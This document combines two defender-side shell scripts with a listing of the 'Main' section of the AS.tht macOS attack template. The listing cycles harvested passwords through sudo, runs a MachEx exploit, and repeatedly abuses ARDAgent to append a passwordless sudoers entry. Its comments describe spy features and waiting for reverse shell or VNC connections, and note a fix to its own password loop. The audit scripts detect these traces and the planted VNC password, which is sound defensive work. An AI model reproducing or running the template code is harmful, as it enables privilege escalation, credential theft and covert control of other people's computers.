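A defender-side audit for the traces the handlers above leave behind, added here as an example and not part of the AS.tht template: it checks the paths the template creates or renames, the sudo alias from alias_sudo, login items pointing into /Library/Caches, the planted VNC password file from pass_the_hash, and extra UID 0 accounts of the kind agent_86_reporting_for_duty_chief creates. ROOT and HOME are assumed parameters so the check can be pointed at a mounted volume or a constructed test tree instead of the live system.

```shell
#!/bin/sh
# Added audit script (example code, not part of the AS.tht template on this
# page). Every path and value it looks for is taken from the template's own
# handlers; ROOT ("" for the live system) and HOME are parameters so the
# check can run against a mounted image or a test tree.

# Print one line per indicator found under ROOT and HOME. Always returns 0.
find_astht_artifacts() {
    root="${1:-}"
    home="${2:-$HOME}"

    # Files and directories the template creates or renames.
    for p in \
        "$home/Library/.sudo2" \
        "$home/Public/.howdy" \
        "$root/Library/.hushnow" \
        "$root/private/etc/xinetd.d/ssh.AStht" \
        "$root/etc/hostconfig.AStht" \
        "$root/Library/WebServer/Documents/.PS_Store" \
        "$root/Users/Shared/SC Info"
    do
        if [ -e "$p" ]; then
            printf 'artifact present: %s\n' "$p"
        fi
    done

    # alias_sudo appends "alias sudo=~/Library/.sudo2" to ~/.profile.
    if [ -f "$home/.profile" ] && grep -q 'alias sudo=' "$home/.profile"; then
        printf 'sudo alias in %s/.profile\n' "$home"
    fi

    # rerun_me_every_startup registers the copy in /Library/Caches as a
    # hidden login item and chmods the plist to 777.
    for plist in \
        "$root/Library/Preferences/com.apple.SystemLoginItems.plist" \
        "$home/Library/Preferences/loginwindow.plist"
    do
        [ -f "$plist" ] || continue
        if grep -aq '/Library/Caches/' "$plist"; then
            printf 'login item under /Library/Caches in %s\n' "$plist"
        fi
        if [ -n "$(find "$plist" -maxdepth 0 -perm -002 2>/dev/null)" ]; then
            printf 'world-writable login item plist: %s\n' "$plist"
        fi
    done

    # pass_the_hash writes a fixed VNC password file when none exists; the
    # constant below is exactly the value the template plants.
    vnc="$root/Library/Preferences/com.apple.VNCSettings.txt"
    if [ -f "$vnc" ] && grep -q '7614220BE8DAA096FF1C39567390ADCA' "$vnc"; then
        printf 'known planted VNC password in %s\n' "$vnc"
    fi
    return 0
}

# Number of indicators found; convenient for alerting and for tests.
count_astht_artifacts() {
    find_astht_artifacts "$@" | wc -l | tr -d ' '
}

# Read "name UniqueID" pairs on stdin (the output format of
# "dscl . -list /Users UniqueID") and print every account other than root
# that has UID 0, which is how the template's hidden admin account is built.
find_extra_uid0_users() {
    awk '$2 == 0 && $1 != "root" { print $1 }'
}

# Run against the live system when invoked directly as: sh audit.sh live
if [ "${1:-}" = "live" ]; then
    find_astht_artifacts "" "$HOME"
    dscl . -list /Users UniqueID | find_extra_uid0_users
fi
```

The hidden-user list and SHOWOTHERUSERS_MANAGED key in /Library/Preferences/com.apple.loginwindow are worth checking with `defaults read` on a live system as well; they are left out here because they cannot be exercised against a test tree.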
---------------------------------------------------------------------------
--Main
--------------------
--HEY! Keep in mind that outgoing communications only happen if be_quiet is set to false
--So, you might want to call is_it_safe and possibly
--these_are_not_the_outgoing_network_communications_you_are_looking_for before getting
--the IP address or sending email
if debug then log_event("Main")
--Get my preferences
read_my_plist()
--Check if sudo works already, do this immediately in case sudo's timestamp timeout is near
can_sudo_come_out_to_play()
--Check if I am a member of the admin group
whos_in_charge_here()
--Setup some folders and files
try
do shell script "mkdir -p -m 777 '/Users/Shared/SC Info/' ~/Public/ /Library/WebServer/Documents/.PS_Store 2>/dev/null; exit 0"
do shell script "touch " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
do shell script "chmod -Rf 777 " & quoted form of candidates_file & " " & quoted form of accounts_file & " " & quoted form of hashes_file & " ~/Public/" & quoted form of secret_file & " /Users/Shared/" & quoted form of secret_file & " /Library/WebServer/Documents/" & quoted form of secret_file & " 2>/dev/null; exit 0"
end try
--If sudo isn't working and I don't have a password, try passwords collected during previous runs on this computer.
if i_have_root_access is false and my_password is "" then
if debug then log_event("Main: trying previously gathered passwords")
local the_passwords, the_password, candidate_text
--Candidates are gathered as text, one per line: the words of my user name first, then whatever earlier runs wrote to the collection files
set AppleScript's text item delimiters to return
set candidate_text to ((words of my_username) as text) & return
set AppleScript's text item delimiters to ""
try
--accounts_file holds user:password lines; keep only the password part of the lines for my own account
set candidate_text to candidate_text & (do shell script "grep " & quoted form of my_username & " " & quoted form of accounts_file & " 2>/dev/null | sed -e 's/^.*://g'") & return
end try
try
set candidate_text to candidate_text & (do shell script "cat " & quoted form of candidates_file & " 2>/dev/null") & return
end try
try
--lines without a colon in the shared secret file are bare password candidates
set candidate_text to candidate_text & (do shell script "grep -v ':' ~/Public/" & quoted form of secret_file & " 2>/dev/null") & return
end try
--Deduplicate with sort -u, then split the output into one list item per line. (The earlier version wrapped the whole shell output in a one-item list, so the loop below only ever tried the entire output as a single "password".)
set the_passwords to paragraphs of (do shell script "printf '%s' " & quoted form of candidate_text & " | tr '\\r' '\\n' | sort -u")
repeat with the_password in the_passwords
try
test_a_password_with_sudo(the_password)
exit repeat
on error error_message number error_number
--Just keep trying until I am out of possible passwords
end try
end repeat
end if
if i_have_root_access is false then
--Try some exploits
--MachEx is only attempted on 10.3.x and 10.4.0 through 10.4.7; this code treats 10.4.8 as the first release with the Mach exception port hole closed
if OSX_version_number_minor as number < 4 or (OSX_version_number_minor as number = 4 and OSX_version_number_mini as number < 8) then
if debug then log_event("Main: Trying MachEx")
--Attempts to run the compiled Mach exception handling exploit from the Contents/Resources directory within this script's application bundle.
--The here-string is fed to MachEx on stdin: the command it carries appends a passwordless sudoers entry for this user and exits. The 5 second timeout keeps a hung exploit from stalling the whole script.
try
with timeout of 5 seconds
do shell script quoted form of my_resources & "/MachEx <<< \"echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers; exit\""
end timeout
can_sudo_come_out_to_play()
end try
end if
if debug then log_event("Main: trying to get ARDAgent to append to /etc/sudoers")
--ARDAgent's 'do shell script' only sometimes runs as root (see above), so the same command is retried up to 20 times.
--A successful call sets tries to 25, which ends the loop. A failed attempt (ARDAgent not launched as root, so the append to /etc/sudoers is denied, or no answer from ARDAgent at all) raises an error that is ignored, and the next try starts.
set tries to 0
repeat until tries ≥ 20
try
set tries to tries + 1
tell application "ARDAgent" to do shell script "echo '" & my_username & (ASCII character 9) & "ALL=(ALL)" & (ASCII character 9) & "NOPASSWD: ALL' >> /etc/sudoers"
set tries to 25
can_sudo_come_out_to_play()
on error error_message number error_number
--ignore
end try
end repeat
end if
--Other stuff I could do
--take pictures - do shell script quoted form of my_resources & "/isightcapture ~/Public/\"$(date).jpg\""
--take screenshots - do shell script "screencapture -xmC ~/public/\"$(date).jpg\""
--Listen to the microphone?
if i_am_an_admin is false and i_have_root_access is false then
if debug then log_event("Main: i_am_an_admin is false and i_have_root_access is false")
stuff_for_a_regular_user_to_do()
end if
if i_am_an_admin is true and i_have_root_access is false then
if debug then log_event("Main: i_am_an_admin is true and i_have_root_access is not true")
stuff_for_an_admin_without_sudo_to_do()
dupe_user()
if i_have_root_access is false then alias_sudo()
end if
if i_have_root_access is true then
if debug then log_event("Main: i_have_root_access is true")
stuff_for_root_to_do()
end if
if all_else_fails then
if debug then log_event("Main: all_else_fails")
--Still to do?
--check for passwords laying around in files to which I have read access
--check for write access to setuid app paths, StartupItems, LoginItems, LaunchDaemons & Agents etc.
--go into quiet mode and just wait for sudo to work or for Master to get the reverse shell or reverse VNC connections. :)
end if
if debug then log_event("THE END")
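Checks a responder can run for the precondition this template relies on (a setuid-root ARDAgent) and for the two traces its Main section leaves behind (a NOPASSWD sudoers entry for a regular account, and the mode-777 staging directories). This script is an added example and is not part of AS.tht or the original page; the function names are mine, the ARDAgent path is the assumed 10.4/10.5 location, every function takes a file or prefix argument so it can also be run against a mounted image, and the sudoers sample used to exercise it is constructed.

```shell
#!/bin/sh
# Defender-side checks for the conditions and traces shown in the AS.tht
# listing above. Added example, not part of the template or the page.
# Assumed: the Mac OS X 10.4/10.5 path of the ARDAgent binary below.

ARDAGENT_DEFAULT='/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent'

# 1. Is the file setuid, and setuid root? The exploit needs the binary to be
#    root-owned with the setuid bit set. Prints one of:
#    missing | not-setuid | setuid-nonroot | setuid-root
ardagent_setuid_state() {
    f="${1:-$ARDAGENT_DEFAULT}"
    [ -e "$f" ] || { echo missing; return 0; }
    if [ ! -u "$f" ]; then
        echo not-setuid
    elif [ -n "$(find "$f" -user root -perm -4000 2>/dev/null)" ]; then
        # -user and -perm -mode are POSIX find primaries, so this works on
        # both the BSD userland of Mac OS X and on GNU findutils.
        echo setuid-root
    else
        echo setuid-nonroot
    fi
}

# 2. Which non-root users does a sudoers file grant passwordless access?
#    Both the MachEx and the ARDAgent branches of Main append the line
#    "<user><TAB>ALL=(ALL)<TAB>NOPASSWD: ALL" to /etc/sudoers, so such an
#    entry for an ordinary account is the primary indicator to look for.
#    Comment, Defaults, *_Alias, %group and +netgroup lines are skipped;
#    #include'd files are not followed.
sudoers_nopasswd_users() {
    f="${1:-/etc/sudoers}"
    [ -r "$f" ] || return 0
    grep -E -v '^[[:space:]]*(#|Defaults|[A-Za-z_]+_Alias|%|[+])' "$f" \
      | grep 'NOPASSWD:' \
      | awk '{ print $1 }' \
      | grep -vx root \
      | sort -u
}

# 3. Staging directories Main creates with "mkdir -p -m 777". PREFIX lets the
#    check run against a volume mounted elsewhere (e.g. a forensic image).
#    Prints "world-writable <path>" or "present <path>" for each one found.
template_staging_dirs() {
    prefix="${1:-}"
    for p in '/Users/Shared/SC Info' '/Library/WebServer/Documents/.PS_Store'; do
        d="$prefix$p"
        [ -d "$d" ] || continue
        if [ -n "$(find "$d" -prune -perm -0002 2>/dev/null)" ]; then
            echo "world-writable $p"
        else
            echo "present $p"
        fi
    done
}

# Stand-alone run against the live system: sh ardcheck.sh --run
if [ "${1:-}" = "--run" ]; then
    echo "ARDAgent: $(ardagent_setuid_state)"
    echo "NOPASSWD users: $(sudoers_nopasswd_users | tr '\n' ' ')"
    template_staging_dirs
fi
```

Two caveats when reading the output. /Users/Shared/SC Info also exists legitimately on machines where iTunes has stored its Store authorization data, so its presence alone means nothing; the world-writable mode and the hidden .PS_Store directory under the web server document root are the better signals. And a system whose ARDAgent is not setuid root is not exposed to this particular vector, whatever the other checks say.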
